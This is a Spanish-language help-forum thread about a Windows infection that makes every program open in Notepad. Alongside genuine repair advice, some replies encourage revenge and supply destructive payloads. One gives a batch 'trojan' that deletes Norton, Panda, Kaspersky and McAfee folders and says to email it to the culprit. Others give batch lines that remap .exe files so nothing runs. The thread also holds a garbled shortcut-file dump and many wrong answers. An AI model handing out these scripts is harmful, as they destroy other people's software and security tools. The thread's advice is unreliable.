Virus Bloc de Notas [Cerrado]

Denunciar
-
 raul -
Hola,
que tal queria saber si me podian ayudar con un virus que obviamente tiene algo que ver con el bloc de notas porque mi hermano descargo una supuesta foto del msn que le pasaron y despues su "amigo" le dijo que era un virus y se reia :S o sea era un virus y se lo mando pensando que estaba en un cyber pero no era mas que mi casa y ahora el problema es que todos los programas que quiero abrir, al hacerles doble click se abre solo un bloc de notas con muchas palabras y numeros estem lo unico que puedo abrir es internet. la unica manera de poner musica por ej. es poniendo abrir con.. elijo y abre la musica pero cualquier otro programa o juegos no los puedo ejecutar sale bloc de notas con todos y/o me tira alguna clase de error. la solucion mia es esperar su respuesta o pegarle al amigo de mi hermano hasta dejarle la cara como anda mi pc ahora :P.
espero su respuesta porque no quiero formatear la pc porque nose nada para empezar y si la formateo la tengo que mandar a un tecnico que cuesta $ 100 con back up que es necesario.

Gracias de bariloche a una respuesta concreta y efectiva para alguien que no sabe nada.

21 respuestas

Message postés
48
Estatus
Miembro
Última intervención
jueves, 8 de agosto de 2013
66
no es un virus ni un troyano lo que tienes sino una mala configuracion el el registro...
38
Gracias

Unas palabras de agradecimiento nunca están de más. Deja tu comentario

CCM 30302 usuarios nos han dicho gracias este mes

como se restaura la pc para quitar eso que todos los pogramas se abren por bloc de notas :( hasta el internet ami me pasa eso
Funciona perfecto del krbon muchas gracias
lo que ha pasado es que la foto contenia un script auto-ejecutable que probablemente haya manipulado archivos ".DLL" de la carpeta "WINDOWS" que es la que contiene y cada vez que abras un ejecutable(con extension exe) se active el script que bloquee la ejecucion del programa
yo se hacer cosas de esas(scripts autoejecutables,comandos batch)mediante bloc de notas
dile al amigo de tu hermano que haga una secuencia de comandos batch para desbloquearlo
y si no sabe metete en una web de tutoriales de comandos batch con bloc de notas(hay muchas) aprende, y jode el ordenador de el amigo de tu hermano
estoy trabajando en una posible solucion
chao
P.D:SI es un virus, lo bueno esk ese tipo de virus se puede contrarrestar.
a mi me paso algo parecido que todo me habria con una sola cosa, pero si iva a donde estaban instalados los programas me habrian normal, lo que paso es que el formato de acceso directo (.ink) se cambio todos por uno xdd, ahora no me explico muy bien, despues me explico mejor
el problema es que vajo un programa y me sige oasando a blok de notas sin asta el enti virus me sale como blok de notas
Message postés
53
Estatus
Miembro
Última intervención
miércoles, 19 de mayo de 2010
88
--Carnal

bajate este

https://es.ccm.net/download/descargar-20225-malwarebytes-anti-malware

y as escaneo completo........ eliminas los problemas y reinicias!

y ya!!

a mi me funciono

Rikhard Aleman

MX, NL.
estem gracias capo por la respuesta concreta pero sigo insistiendo en que no me deja abrir nada
o sea baje tu archivo lo abro y cuando hago 2 click sobre msn e-fix.exe por ej y me abre el bloc de notas
me explicas como hago para que no abra el bloc de notas y abra el programa que me pasaste y como lo uso
porque esta ese archivo que te nombre y otro que tiene ares que conecta de 1.rar / macrossf.jpg y
msncore.dll por favor ! :) ojala fuese tan facil ir a buscarlo y pegarle.
pero descargate el ccleaner eso te ayudara te borra tus juegos y tus programas pero te elimina el virus
ah y aparte del ccleaner bajate tambien el AVG Anti-Virus le haces escaneo a la pc y en resultados te sale el virus dale eliminar todo y se te elimina el virus
No vale ati lo que te enviaron fue una configuracion de programacion
Como dices que te apaceren los numeros y sinbolos como como asi

@echo off
sep /p var=
title
msg *
start
dir

y una serie de numeros, si eso es asi como dices eso es una especie de codigos de programacion con el fin de no abrir los archivos de windows si no el blos de notas o notepad yo me llamo freddy si puedes copiar y pegar esos codigos aki yo veo aver si te puedo ayudar
L  À F>  fSÚ'¶+Ì...#«^~JÍôãò~...DÍê  8 DGYr?§D0/00ÅU*þk0î~ t  CFSF 1 u=[ AppData tY^-ßÓH g3¼î(ºÅÍúßYgVA0/00GÅÇkÀ¶<   ï¾ï>'ï>'* G  A p p D a t a B L 1 Î@ " Local 8   ï¾ï>'Î@ "*   L o c a l  P 1 ?  Google :   ï¾ö>oe¨? * n1  G o o g l e  P 1 Î@ã' Chrome :   ï¾ö>©Î@ã'* ³3  C h r o m e  \ 1 Î@ê' APPLIC~1 D   ï¾I?Ô~Î@ê'* âT  A p p l i c a t i o n  \ 2 ê Ç@×A chrome.exe B   ï¾I?Ô~Î@ê'* °X  c h r o m e . e x e  |    1 {   |½T ACER C:\Users\HEIDER MEDINA\AppData\Local\Google\Chrome\Application\chrome.exe 5 . . \ A p p D a t a \ L o c a l \ G o o g l e \ C h r o m e \ A p p l i c a t i o n \ c h r o m e . e x e > C : \ U s e r s \ H E I D E R M E D I N A \ A p p D a t a \ L o c a l \ G o o g l e \ C h r o m e \ A p p l i c a t i o n   ÿÿÿÿ  |ÎóIÌJ+HÕÔKï  '  X heidermedina-pc V¼Ya"â3M¦bÈ'OEΩ(TM) "òà+V jS>FÈV¼Ya"â3M¦bÈ'OEΩ(TM) "òà+V jS>FÈù ­ 1SPS0ñ%·ïG¥ñ'OEzë¬)
 c h r o m e . e x e )   A p l i c a c i ó n   @ 'G"¶+Ì  ê   @ |(TM)...DÍ 1SPSâSXF¼L8C»ü"&~mÎq   / S - 1 - 5 - 2 1 - 3 9 5 5 5 8 5 2 2 5 - 3 4 5 1 6 6 6 9 4 6 - 1 5 6 7 4 9 1 9 5 1 - 1 0 0 0 µ 1SPSí0½ÚC 0/00G§øФsf"(TM) d  D A p p l i c a t i o n ( C : \ U s u a r i o s \ H E I D E R M E D I N A \ A p p D a t a \ L o c a l \ G o o g l e \ C h r o m e ) Á 1SPS¦jc(=*ÒµÖ ÀOÙÐ¥   J C : \ U s e r s \ H E I D E R M E D I N A \ A p p D a t a \ L o c a l \ G o o g l e \ C h r o m e \ A p p l i c a t i o n \ c h r o m e . e x e = 1SPSU(LYyY9K¨ÐáÔ-áÕó!    C h r o m e
si borro el bloc de notas sera para bien o para mal ? o sea todo abre con el bloc de notas si lo borro que pasa o pasara ? porfavor me ta volviendo loco el bloc de notas de mierda.
hola porfa dime como sacaste el virus ,,, me pasa lo mismo con el bock de notas
pero haz esto formateala haz particion al disco duro unidad c:\ y le haces respaldo a la computadora
PERO MI COMPUTADORA YA TIENE PARTICION PARA PROTEGER MIS DATOS, LO QUE TIENE MI COMPUTADORA ES IGUAL ALO QUE HABLA FERNANDO, LA ESTADISTICA PARA RESOLVER ESTE PROBLEMA ES FORMATEANDO EL SISTEMA OPERATIVO PORQUE ESTA DAÑADO
ESPERO QUE LES HAYA AYUDADO BUENOS CUIDENSE CHAUU, MI MSM ES JHONNYGA@HOTMAIL.COM BYE..
no se poede ta pasao ami me sal lo mismo q alguien no poede responder algo claro mrd
pus yo diria q abras tu pc desde modo seguro la prendes, aprietas f8 barias vesses te saldera un mednu le das clic en modo seguro despues de q la pc funcione elimina el dicho virus
Busca en google con el titulo tal cual mncionas (virus en msn via fotografia eliminar) y te dara opciones de herramientas que desacrgas y aplicas.
Hola encontraste la soluciion?
tengo el mismo problema pero veo que la gente nomas te dice instala eso y no leen que ningun .exe se puede ejecutar. ¿no leeràn?
No hay que responder cosas si no se tiene una idea, o ni siquiera se pasó por el problema. Un simple FIX no puede resolver el problema si antes no sacas el malware, y no podes analizar en busca de amenazas con Windows corriendo si los programas no se ejecutan, porque son archivos exe también. hace falta aclarar que bajar otro antivirus tampoco va a resolver el problema? restaurar sistema lo veo difícil también, el virus seguirá en el sistema, no es una solución segura. hay que deshabilitar la restauración del sistema, analizar el sistema con algún cd de rescate, como el Dr. Web, entre muchos otros, los cuales analizan el sistema antes de que inicie Windows. Luego, si encontró y quitó las amenazas, ejecutar algún FIX que repare el problema. Analizar con Malwarebytes anti-malware. Luego limpiar el registro y actualizar el sistema operativo. Y por último, ponerte un antivirus que valga la pena. Saludos!
ya se!! abre cmd ( es en inicio, ejecutar y escribe cmd y aceptar ) cuando ya tienes abierto el codigo del sistema escribe:
Assoc .exe=
y te aparesera esto:
exefile
si te aparese otra cosa en vez de esto, escribe lo siguiente:
Assoc .exe=exefile
y listo
EXPLICASION
el exe esta configurado a que lo abra con blok de notas, no con exe, y esos signos extraños son por el LENGUAJE MAQUINA, que consiste en letras, cuadros y signos extraños, y esta vez vamos a configuar el exe como un ejecutable

nota:
el cmd es un exe, y como se desconfiguro el exe, alomejor no funciona el cmd, pero sitienes suerte el cmd no estara desconfigurado, y si esta desconfigurado, como dise el dicho ''ojo por ojo'' enviale este codigo y guardalo en batch:
Assoc .exe=jpegfile
y si no eres tan malo, solo dale un golpe al desgrasiado XD
esta respuesta no sirve, usa la otra respuesta que escribí
YO TENGO EL PROBLEMA IGUAL K EL TUYO QUISIERA SABER COMO LO HAZ ARREGLADO O TODAVIA NADA
TENGO EL MISMO PROBLEMA AHORA NECESITO QUE ALGUIEN ME AYUDEEEEEEEEEEE POR FAVOR

hola men como estas tengo una solucion sencilla para ti enrealidad no se mucho de como pueda ayudarte a quitarle ese virus que tiene tu pc tienes dos opciones coje y partele la cara como dices o si no mandale este caballo de troya que te dejo aqui solo lo que tienes que hacer es abrir tu blocs de nota y pones lo siguiente...
@echo off
cls
cd \
cd "archivos de programa"
cd "Norton antivirus"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Panda Software"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Kaspersky Lab"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "McAfee.com"
attrib -R -A -S -H *.*
del /S /Q *.*
cls

cuando pongas eso en el bloc de notas vas a archico y das guardar como pero la carpeta puede tener cualquier nombre ejemplo hacker.bat enteindes y despues solo enviaselo por email espero que te haya servido de algo esto si tienes dudas escribeme a yadier2009delvalle@yahoo.es
formaterolo en tu caso es facil y gratis solo tienes k ir al blog sd notas(k ati t sale automaticamente)entonnces...lo k aces es escribir una clave k no la voy a decir y no me ago responsable si kieres me la puedes pedir por privado..(k es el virus) le das a guardar como,pones el nombre y segudo .bat asi: nombre.bat
y entonces eso se puede camuflar y todo pero en tu caso lo k tienes k acer es abrirlo tu mismo para k el virus t llegue atii y ese es un virus k formatea el ordenador automaticamente....
es un virus de gran utilidad
lo unico que haga es resturar tu pc a mi mi hemano hizo lo mismo sino que el mio se abria com word restaura tu pc
claro tiene razon no es un virus ni un troyano lo que tienes sino una mala configuracion del el registro
Ya see!! primero abre el cmd ( si no sabes, ve a inicio, ejecutar y escribes CMD y aseptar), luego escribes:
Assoc .exe
y te aparecera esto:
exefile
si te aparece otra cosa en vez de esto, escribe esto:
Assoc .exe=exefile
y listo
Nota: el cmd esu un exe, podria ser que se desconfiguró, pero, si tienes suerte, no va a estar desconfigurado. Si quieres tomar venganza, escribe esto en bloc de notas y guardalo como batch:
Assoc .exe=txtfile
Pero si no eres tan malo, solo dale unos zapes al desgraciado XDDD
SEGURAMENTE ES UN SPIWARE TE EXPLICO EL VIRUS SPIWARE TE UTILIZA LA MAQUINA TE BRRA DATOS ARCHIVOS ETC ES UNA EXPLICACION POCO TECNICA PERO RAZONABLE LO QUE TENES QUE HACER ES BAJARTE ESTE PROGRAMA ANTI SPIWARE: MALWARWBITES
BUENO NADA MAS, SUERTE
Message postés
48
Estatus
Miembro
Última intervención
jueves, 8 de agosto de 2013
66
entra en esta pagina y baja el archivo con la extension que te cause problemas

http://www.dougknox.com/xp/file_assoc.htm

exe

http://www.dougknox.com/xp/fileassoc/xp_exe_fix.zip
descarga un antivirus
por cualquier problema, puedes enviarme el archivo guardado. en e bloc de notas que te aparece.....puedes enviarmelo a mi correo : jorge.cubillavillamayor@gmail.com......queisiera entender de que tipo de problemas se metieron....para poder ayudarlos...... pero por cada . osino me agarras a mi tambien......